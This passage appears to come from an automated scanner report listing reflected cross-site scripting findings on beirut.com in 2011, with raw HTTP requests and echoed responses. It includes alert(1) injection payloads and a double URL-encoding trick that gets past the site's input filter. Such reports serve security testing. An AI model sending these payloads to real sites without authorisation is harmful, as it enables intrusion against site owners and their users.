Content-Type: text/html; charset=UTF-8
Content-Length: 61569

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='ThingsToDo/Exhibitions7e1d9'-alert(1)-'c8b1e6c1dea';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1097. http://www.beirut.com/ThingsToDo/Exhibitions/6382333962 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/ThingsToDo/Exhibitions/6382333962

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 582c7"><a>fe506376230 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDo/Exhibitions582c7"><a>fe506376230/6382333962 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:58:52 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=orange&indexpage=ThingsToDo/Exhibitions582c7"><a>fe506376230&listingtype=events.php&Types=16">
...[SNIP]...

4.1098. http://www.beirut.com/ThingsToDo/Festivals/272910464 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Festivals/272910464

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9af28'-alert(1)-'01fcb4776a3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ThingsToDo9af28'-alert(1)-'01fcb4776a3/Festivals/272910464 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:55:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63435

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='ThingsToDo9af28'-alert(1)-'01fcb4776a3/Festivals';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1099. http://www.beirut.com/ThingsToDo/Festivals/272910464 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/ThingsToDo/Festivals/272910464

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c41b"><a>0ed6ef3c7d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDo9c41b"><a>0ed6ef3c7d1/Festivals/272910464 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:45:42 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=purple&indexpage=ThingsToDo9c41b"><a>0ed6ef3c7d1/Festivals&listingtype=events.php&Types=">
...[SNIP]...

4.1100. http://www.beirut.com/ThingsToDo/Festivals/272910464 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/ThingsToDo/Festivals/272910464

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b690"><a>bf31567f7f3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDo/Festivals9b690"><a>bf31567f7f3/272910464 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:59:01 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55423

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=purple&indexpage=ThingsToDo/Festivals9b690"><a>bf31567f7f3&listingtype=events.php&Types=4">
...[SNIP]...

4.1101. http://www.beirut.com/ThingsToDo/Festivals/272910464 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Festivals/272910464

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30f44'-alert(1)-'fbf0ff05bf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ThingsToDo/Festivals30f44'-alert(1)-'fbf0ff05bf/272910464 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:09:11 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='ThingsToDo/Festivals30f44'-alert(1)-'fbf0ff05bf';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1102. http://www.beirut.com/ThingsToDo/Gatherings/9274143605 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/ThingsToDo/Gatherings/9274143605

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb3b7"><a>cd78af03c39 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDocb3b7"><a>cd78af03c39/Gatherings/9274143605 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:54:00 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62481

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=blue&indexpage=ThingsToDocb3b7"><a>cd78af03c39/Gatherings&listingtype=events.php&Types=">
...[SNIP]...

4.1103. http://www.beirut.com/ThingsToDo/Gatherings/9274143605 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Gatherings/9274143605

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54a8f'-alert(1)-'5c8fa22cc09 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ThingsToDo54a8f'-alert(1)-'5c8fa22cc09/Gatherings/9274143605 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:04:39 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63289

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='ThingsToDo54a8f'-alert(1)-'5c8fa22cc09/Gatherings';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1104. http://www.beirut.com/ThingsToDo/Gatherings/9274143605 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/ThingsToDo/Gatherings/9274143605

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 621ed"><a>df0156576a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDo/Gatherings621ed"><a>df0156576a4/9274143605 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:06:51 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56495

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=orange&indexpage=ThingsToDo/Gatherings621ed"><a>df0156576a4&listingtype=events.php&Types=14">
...[SNIP]...

4.1105. http://www.beirut.com/ThingsToDo/Gatherings/9274143605 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Gatherings/9274143605

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26451'-alert(1)-'fc0e4a8341b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ThingsToDo/Gatherings26451'-alert(1)-'fc0e4a8341b/9274143605 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:15:21 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='ThingsToDo/Gatherings26451'-alert(1)-'fc0e4a8341b';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1106. http://www.beirut.com/ThingsToDo/Gemmayzeh/Karaoke-Night-at-Dice/1921 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Gemmayzeh/Karaoke-Night-at-Dice/1921

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e45e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e34969f99ff4 was submitted in the REST URL parameter 4. This input was echoed as 5e45e"><script>alert(1)</script>34969f99ff4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /ThingsToDo/Gemmayzeh/Karaoke-Night-at-Dice/19215e45e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e34969f99ff4 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 06:34:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a id="moreinfo" rel="facebox" href="/moreInfo.php?contactid=19215e45e"><script>alert(1)</script>34969f99ff4&randstyle=green">
...[SNIP]...

4.1107. http://www.beirut.com/ThingsToDo/Gemmayzeh/Karaoke-Night-at-Dice/1921 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Gemmayzeh/Karaoke-Night-at-Dice/1921

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8903e%2527%253balert%25281%2529%252f%252f0b6b7031eb1 was submitted in the REST URL parameter 4. This input was echoed as 8903e';alert(1)//0b6b7031eb1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /ThingsToDo/Gemmayzeh/Karaoke-Night-at-Dice/19218903e%2527%253balert%25281%2529%252f%252f0b6b7031eb1 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 06:36:08 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Index';
var initfacebox='';
var contactid='19218903e';alert(1)//0b6b7031eb1';
var showfacebox='';
</script>
...[SNIP]...

4.1108. http://www.beirut.com/ThingsToDo/Hamra/Contact-Workshop-For-Beginners/6138 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Hamra/Contact-Workshop-For-Beginners/6138

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 382ca%2527%253balert%25281%2529%252f%252f69c1aa4ab53 was submitted in the REST URL parameter 4. This input was echoed as 382ca';alert(1)//69c1aa4ab53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /ThingsToDo/Hamra/Contact-Workshop-For-Beginners/6138382ca%2527%253balert%25281%2529%252f%252f69c1aa4ab53 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 06:35:55 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Index';
var initfacebox='';
var contactid='6138382ca';alert(1)//69c1aa4ab53';
var showfacebox='';
</script>
...[SNIP]...

4.1109. http://www.beirut.com/ThingsToDo/Hamra/Contact-Workshop-For-Beginners/6138 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Hamra/Contact-Workshop-For-Beginners/6138

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 322c3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebeaa1e96712 was submitted in the REST URL parameter 4. This input was echoed as 322c3"><script>alert(1)</script>beaa1e96712 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /ThingsToDo/Hamra/Contact-Workshop-For-Beginners/6138322c3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebeaa1e96712 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
